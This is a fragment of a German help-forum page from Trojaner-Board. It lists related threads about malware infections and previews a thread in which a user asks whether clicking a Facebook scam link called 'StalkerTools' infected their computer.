  11. Spamlink zu "likeit.php" angeklickt. Rechner verseucht ?
    Überwachung, Datenschutz und Spam - 08.07.2012 (5)
  12. PC wiederholt verseucht mit "Live Security Platinum", jetzt wieder sauber?
    Log-Analyse und Auswertung - 21.06.2012 (1)
  13. Facebook Scamseite angeklickt - jbiebergirls - rechner nun verseucht?
    Plagegeister aller Art und deren Bekämpfung - 07.01.2011 (13)
  14. Hilfe! "Trojan.Agent" und "Rogue.Residue" auf dem Rechner.
    Plagegeister aller Art und deren Bekämpfung - 02.05.2009 (13)
  15. Kriege "TR/Rootkit.Gen" und "TR/PSW.PdPi.CT.1.D" nicht von Rechner runter!
    Plagegeister aller Art und deren Bekämpfung - 05.02.2009 (30)
  16. "Adware.Virtumonde"/"Downloader.MisleadApp"/"TR/VB.agt.4"/"NewDotNet.A.1350"/"Fakerec
    Plagegeister aller Art und deren Bekämpfung - 22.08.2008 (6)
  17. Rechner "lacht" und Elvis "singt"
    Plagegeister aller Art und deren Bekämpfung - 15.03.2005 (5)

Zum Thema Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht? - Hallo, aufgrund von nicht zu entschuldigender geistiger Umnachtung habe ich in Facebook einen Link geklickt und mir dabei ein Script eingefangen, von dem ich nicht weiß, was es genau gemacht - Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht?...
Archiv
Du betrachtest: Facebook Scamseite angeklickt - "StalkerTools" - Rechner nun verseucht? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.